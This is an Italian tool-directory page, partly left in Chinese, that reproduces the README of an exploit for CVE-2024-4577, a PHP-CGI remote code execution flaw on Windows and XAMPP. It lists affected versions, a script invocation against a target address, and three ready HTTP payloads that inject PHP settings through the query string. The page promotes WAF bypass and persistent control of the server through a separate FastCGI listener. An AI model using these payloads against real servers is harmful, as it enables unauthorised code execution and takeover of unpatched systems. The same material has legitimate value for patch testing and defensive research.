Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577-PHP-RCE — Exploit per CVE-2024-4577 PHP-CGI RCE su Windows, con bypass WAF e supporto SSRF. Fornisce più varianti di exploit per scenari predefiniti, WAF e SSRF. | Kitploit
Strumenti/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFPenetration Testing
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

Exploit per CVE-2024-4577 PHP-CGI RCE su Windows, con bypass WAF e supporto SSRF. Fornisce più varianti di exploit per scenari predefiniti, WAF e SSRF.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
42 anni faNon ancora revisionato
Condividi

CVE-2024-4577-PHP-RCE

Descrizione del progetto e principio

  • Prima EXP al mondo per la vulnerabilità CVE-2024-4577 PHP-CGI RCE che sfrutta l'ambiente PHP predefinito (XAMPP).
  • Il primo exploit al mondo per CVE-2024-4577 PHP-CGI RCE che utilizza l'ambiente PHP predefinito. Condivide l'exploit originale, supporta SSRF, supporta il bypass del WAF.
  • RCE nell'ambiente PHP predefinito. Principio: cgi.force_redirect + REDIRECT-STATUS.
  • Nuova EXP originale, supporta l'approccio per bypassare gli scenari WAF. Principio: creazione di un server FastCGI + comunicazione tramite protocollo FastCGI.
  • Nuova EXP originale, supporta l'approccio per scenari SSRF. Principio: protocollo data:// + richieste GET.

Vantaggi di EXP 1

  • RCE senza bisogno di allow_url_include, auto_prepend_file, auto_append_file. Può includere qualsiasi file e file PHP.
  • Non compaiono le parole chiave spesso bloccate dal WAF allow_url_include, auto_prepend_file, auto_append_file.
  • Tutte le comunicazioni del server FastCGI non vengono registrate dal WAF.
  • Ascolta su una nuova porta, realizzando così un controllo persistente del server PHP, indipendente da Apache e PHP.
  • Riepilogo della vulnerabilità

    InformazioneContenuto
    Nome della vulnerabilitàPHP RCE
    ID della vulnerabilitàCVE-2024-4577
    Livello di rischioAlto
    Tipo di vulnerabilitàRCE
    Difficoltà di sfruttamentoBassa

    Versioni interessate

    • PHP versione Windows 8.3.0 <= versione interessata < 8.3.8
    • PHP versione Windows 8.2.0 <= versione interessata < 8.2.20
    • PHP versione Windows 8.1.0 <= versione interessata < 8.1.29
    • PHP versione Windows versione interessata == 8.0.x
    • PHP versione Windows versione interessata == 7.x
    • PHP versione Windows versione interessata == 5.x
    • XAMPP versione Windows 8.2.0 <= versione interessata <= 8.2.12
    • XAMPP versione Windows 8.1.0 <= versione interessata <= 8.1.25
    • XAMPP versione Windows versione interessata == 8.0.x
    • XAMPP versione Windows versione interessata == 7.x
    • XAMPP versione Windows versione interessata == 5.x

    EXP 1

    Può essere utilizzata in scenari di bypass WAF + scenario predefinito:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Esempio:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Può essere utilizzata in scenari SSRF + scenario predefinito:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Può essere utilizzata nello scenario predefinito:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Può essere utilizzata nello scenario predefinito:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Riproduzione

    1. Ambiente del server:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. Scaricare e installare XAMPP sul server:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. Configurazione del server
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. Utilizzo dell'EXP sul client
    root@kitploit:~
    使用上述EXP进行测试
    
    1. Verifica
    root@kitploit:~
    观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
    
    Scarica lo strumento